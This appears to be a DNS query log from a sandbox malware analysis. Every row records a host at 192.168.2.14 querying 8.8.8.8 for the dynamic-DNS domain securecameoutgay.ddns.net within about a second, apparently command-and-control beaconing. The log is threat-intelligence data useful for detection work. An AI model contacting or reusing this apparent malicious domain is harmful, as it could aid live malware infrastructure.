                                                    Oct 12, 2024 23:06:16.443169117 CEST192.168.2.148.8.8.80xe0f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.449768066 CEST192.168.2.148.8.8.80xe0f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.456758022 CEST192.168.2.148.8.8.80xe0f1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.463514090 CEST192.168.2.148.8.8.80x589dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.470336914 CEST192.168.2.148.8.8.80x589dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.477483034 CEST192.168.2.148.8.8.80x589dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.490334988 CEST192.168.2.148.8.8.80x589dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.500581980 CEST192.168.2.148.8.8.80x589dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.507689953 CEST192.168.2.148.8.8.80x19f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.514529943 CEST192.168.2.148.8.8.80x19f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.521372080 CEST192.168.2.148.8.8.80x19f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.528253078 CEST192.168.2.148.8.8.80x19f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.534949064 CEST192.168.2.148.8.8.80x19f7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.541830063 CEST192.168.2.148.8.8.80x8131Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.548536062 CEST192.168.2.148.8.8.80x8131Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.555264950 CEST192.168.2.148.8.8.80x8131Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.561677933 CEST192.168.2.148.8.8.80x8131Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.568212032 CEST192.168.2.148.8.8.80x8131Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.575248003 CEST192.168.2.148.8.8.80x68d1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.582329035 CEST192.168.2.148.8.8.80x68d1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.589200020 CEST192.168.2.148.8.8.80x68d1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.595885992 CEST192.168.2.148.8.8.80x68d1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.602461100 CEST192.168.2.148.8.8.80x68d1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.609935045 CEST192.168.2.148.8.8.80xd378Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.616970062 CEST192.168.2.148.8.8.80xd378Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.623589039 CEST192.168.2.148.8.8.80xd378Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.630661964 CEST192.168.2.148.8.8.80xd378Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.637317896 CEST192.168.2.148.8.8.80xd378Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.643881083 CEST192.168.2.148.8.8.80x9605Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.660358906 CEST192.168.2.148.8.8.80x9605Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.666941881 CEST192.168.2.148.8.8.80x9605Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.673485041 CEST192.168.2.148.8.8.80x9605Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.679992914 CEST192.168.2.148.8.8.80x9605Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.686908960 CEST192.168.2.148.8.8.80xf623Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.693711996 CEST192.168.2.148.8.8.80xf623Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.700500011 CEST192.168.2.148.8.8.80xf623Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.707379103 CEST192.168.2.148.8.8.80xf623Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.713927031 CEST192.168.2.148.8.8.80xf623Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.720853090 CEST192.168.2.148.8.8.80xd353Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.727777958 CEST192.168.2.148.8.8.80xd353Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.734534979 CEST192.168.2.148.8.8.80xd353Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.741559982 CEST192.168.2.148.8.8.80xd353Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.749190092 CEST192.168.2.148.8.8.80xd353Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.756079912 CEST192.168.2.148.8.8.80x9462Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.763320923 CEST192.168.2.148.8.8.80x9462Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.769771099 CEST192.168.2.148.8.8.80x9462Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.776448011 CEST192.168.2.148.8.8.80x9462Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.783499002 CEST192.168.2.148.8.8.80x9462Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.790416002 CEST192.168.2.148.8.8.80x3ed7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.797316074 CEST192.168.2.148.8.8.80x3ed7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.803929090 CEST192.168.2.148.8.8.80x3ed7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.810587883 CEST192.168.2.148.8.8.80x3ed7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.816919088 CEST192.168.2.148.8.8.80x3ed7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.823492050 CEST192.168.2.148.8.8.80x4f86Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.830063105 CEST192.168.2.148.8.8.80x4f86Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.836498022 CEST192.168.2.148.8.8.80x4f86Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.843332052 CEST192.168.2.148.8.8.80x4f86Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.849792004 CEST192.168.2.148.8.8.80x4f86Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.856199980 CEST192.168.2.148.8.8.80x8533Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.862951994 CEST192.168.2.148.8.8.80x8533Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.869971037 CEST192.168.2.148.8.8.80x8533Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.877759933 CEST192.168.2.148.8.8.80x8533Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.884581089 CEST192.168.2.148.8.8.80x8533Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.891606092 CEST192.168.2.148.8.8.80x5cb4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.899007082 CEST192.168.2.148.8.8.80x5cb4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.906299114 CEST192.168.2.148.8.8.80x5cb4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.913191080 CEST192.168.2.148.8.8.80x5cb4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.919939995 CEST192.168.2.148.8.8.80x5cb4Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.927953959 CEST192.168.2.148.8.8.80xca60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.934745073 CEST192.168.2.148.8.8.80xca60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.941369057 CEST192.168.2.148.8.8.80xca60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.949027061 CEST192.168.2.148.8.8.80xca60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.956198931 CEST192.168.2.148.8.8.80xca60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.962860107 CEST192.168.2.148.8.8.80x8dc6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.972738028 CEST192.168.2.148.8.8.80x8dc6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.979393005 CEST192.168.2.148.8.8.80x8dc6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.985869884 CEST192.168.2.148.8.8.80x8dc6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:16.993103981 CEST192.168.2.148.8.8.80x8dc6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.000066996 CEST192.168.2.148.8.8.80xf4b2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.006468058 CEST192.168.2.148.8.8.80xf4b2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.013300896 CEST192.168.2.148.8.8.80xf4b2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.020093918 CEST192.168.2.148.8.8.80xf4b2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.027157068 CEST192.168.2.148.8.8.80xf4b2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.034207106 CEST192.168.2.148.8.8.80x5516Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.040762901 CEST192.168.2.148.8.8.80x5516Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.048809052 CEST192.168.2.148.8.8.80x5516Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.055783987 CEST192.168.2.148.8.8.80x5516Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.063225985 CEST192.168.2.148.8.8.80x5516Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.070202112 CEST192.168.2.148.8.8.80xaf58Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.077163935 CEST192.168.2.148.8.8.80xaf58Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.086978912 CEST192.168.2.148.8.8.80xaf58Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.094305992 CEST192.168.2.148.8.8.80xaf58Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.101524115 CEST192.168.2.148.8.8.80xaf58Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.108659029 CEST192.168.2.148.8.8.80xc271Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.115431070 CEST192.168.2.148.8.8.80xc271Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.122045040 CEST192.168.2.148.8.8.80xc271Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.130584002 CEST192.168.2.148.8.8.80xc271Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.138019085 CEST192.168.2.148.8.8.80xc271Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.145329952 CEST192.168.2.148.8.8.80x729bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.152313948 CEST192.168.2.148.8.8.80x729bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.159286976 CEST192.168.2.148.8.8.80x729bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.166229963 CEST192.168.2.148.8.8.80x729bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.173079967 CEST192.168.2.148.8.8.80x729bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.180413961 CEST192.168.2.148.8.8.80x6dc5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.187702894 CEST192.168.2.148.8.8.80x6dc5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.196288109 CEST192.168.2.148.8.8.80x6dc5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.203129053 CEST192.168.2.148.8.8.80x6dc5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.210078001 CEST192.168.2.148.8.8.80x6dc5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.216993093 CEST192.168.2.148.8.8.80xc3baStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.223418951 CEST192.168.2.148.8.8.80xc3baStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.231031895 CEST192.168.2.148.8.8.80xc3baStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.237493992 CEST192.168.2.148.8.8.80xc3baStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.244055986 CEST192.168.2.148.8.8.80xc3baStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.251194000 CEST192.168.2.148.8.8.80xd47cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.258037090 CEST192.168.2.148.8.8.80xd47cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.264873028 CEST192.168.2.148.8.8.80xd47cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.272105932 CEST192.168.2.148.8.8.80xd47cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.279299021 CEST192.168.2.148.8.8.80xd47cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.286452055 CEST192.168.2.148.8.8.80x9f85Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.293220997 CEST192.168.2.148.8.8.80x9f85Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.300101995 CEST192.168.2.148.8.8.80x9f85Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.306821108 CEST192.168.2.148.8.8.80x9f85Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.313587904 CEST192.168.2.148.8.8.80x9f85Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.320970058 CEST192.168.2.148.8.8.80x9891Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.329430103 CEST192.168.2.148.8.8.80x9891Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.336510897 CEST192.168.2.148.8.8.80x9891Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.343276978 CEST192.168.2.148.8.8.80x9891Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.350081921 CEST192.168.2.148.8.8.80x9891Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.356844902 CEST192.168.2.148.8.8.80x66a7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.363909960 CEST192.168.2.148.8.8.80x66a7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.370573997 CEST192.168.2.148.8.8.80x66a7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.377202988 CEST192.168.2.148.8.8.80x66a7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.383883953 CEST192.168.2.148.8.8.80x66a7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.390537024 CEST192.168.2.148.8.8.80x5b9fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.397075891 CEST192.168.2.148.8.8.80x5b9fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.403578997 CEST192.168.2.148.8.8.80x5b9fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.410043001 CEST192.168.2.148.8.8.80x5b9fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.416642904 CEST192.168.2.148.8.8.80x5b9fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.423180103 CEST192.168.2.148.8.8.80x83a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.431021929 CEST192.168.2.148.8.8.80x83a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.437382936 CEST192.168.2.148.8.8.80x83a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.443737030 CEST192.168.2.148.8.8.80x83a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.450449944 CEST192.168.2.148.8.8.80x83a8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.457207918 CEST192.168.2.148.8.8.80x624fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.464128971 CEST192.168.2.148.8.8.80x624fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.470843077 CEST192.168.2.148.8.8.80x624fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.477884054 CEST192.168.2.148.8.8.80x624fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.484462976 CEST192.168.2.148.8.8.80x624fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.496421099 CEST192.168.2.148.8.8.80x8e5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.502999067 CEST192.168.2.148.8.8.80x8e5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.509778976 CEST192.168.2.148.8.8.80x8e5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.516479969 CEST192.168.2.148.8.8.80x8e5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.523078918 CEST192.168.2.148.8.8.80x8e5dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.530004025 CEST192.168.2.148.8.8.80xdb02Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.536504984 CEST192.168.2.148.8.8.80xdb02Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.543171883 CEST192.168.2.148.8.8.80xdb02Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.549725056 CEST192.168.2.148.8.8.80xdb02Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.556719065 CEST192.168.2.148.8.8.80xdb02Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.563541889 CEST192.168.2.148.8.8.80xe7b0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.570400953 CEST192.168.2.148.8.8.80xe7b0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.576967955 CEST192.168.2.148.8.8.80xe7b0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.583478928 CEST192.168.2.148.8.8.80xe7b0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.589973927 CEST192.168.2.148.8.8.80xe7b0Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.596529007 CEST192.168.2.148.8.8.80xbfa2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.602935076 CEST192.168.2.148.8.8.80xbfa2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.609524965 CEST192.168.2.148.8.8.80xbfa2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.616242886 CEST192.168.2.148.8.8.80xbfa2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.622612000 CEST192.168.2.148.8.8.80xbfa2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.629371881 CEST192.168.2.148.8.8.80x1f25Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.635637999 CEST192.168.2.148.8.8.80x1f25Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.642210960 CEST192.168.2.148.8.8.80x1f25Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.649002075 CEST192.168.2.148.8.8.80x1f25Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.655699015 CEST192.168.2.148.8.8.80x1f25Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.662631035 CEST192.168.2.148.8.8.80xe199Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.676271915 CEST192.168.2.148.8.8.80xe199Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.682722092 CEST192.168.2.148.8.8.80xe199Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.689086914 CEST192.168.2.148.8.8.80xe199Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.695558071 CEST192.168.2.148.8.8.80xe199Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.702266932 CEST192.168.2.148.8.8.80xc949Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.708825111 CEST192.168.2.148.8.8.80xc949Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.715403080 CEST192.168.2.148.8.8.80xc949Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.721940994 CEST192.168.2.148.8.8.80xc949Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.728625059 CEST192.168.2.148.8.8.80xc949Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.735160112 CEST192.168.2.148.8.8.80x941dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.741841078 CEST192.168.2.148.8.8.80x941dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.748496056 CEST192.168.2.148.8.8.80x941dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:06:17.755213976 CEST192.168.2.148.8.8.80x941dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
